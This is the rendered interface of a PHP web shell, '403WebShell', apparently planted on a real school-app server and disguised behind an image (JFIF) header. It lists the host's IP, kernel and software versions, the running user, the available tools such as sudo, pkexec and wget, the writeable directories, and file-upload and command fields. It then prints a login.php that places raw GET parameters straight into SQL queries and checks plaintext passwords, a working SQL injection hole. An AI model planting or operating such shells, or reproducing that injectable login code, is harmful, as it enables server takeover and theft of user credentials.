????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.61
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old8/Wordslide/Phps/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old8/Wordslide/Phps/login.php
<?php
    
    require_once('connection.php');
    
    $UserId = $_GET['UserId'];
    $Password = $_GET['Password'];
    
    $sql = "SELECT Id, HighScore from tblUsers WHERE UserId=$UserId AND Password=$Password";
    
    $result = mysqli_query($connection, $sql);
    
    if ($result->num_rows > 0)
    {
        $rows = Array();
        $row = mysqli_fetch_array($result);
        array_push($rows, $row);
        
        $DbId = $row['Id'];
        
        $IsLoggedIn = true;
        $sqlUpdate = "UPDATE tblUsers SET IsLoggedIn=$IsLoggedIn WHERE Id=$DbId";
        mysqli_query($connection, $sqlUpdate);
        
        echo json_encode(array("result"=>$rows));
    }
    else
    {
        echo "Wrong UserId or Password";
    }
    
    mysqli_close($connection);
?>

Youez - 2016 - github.com/yon3zu
LinuXploit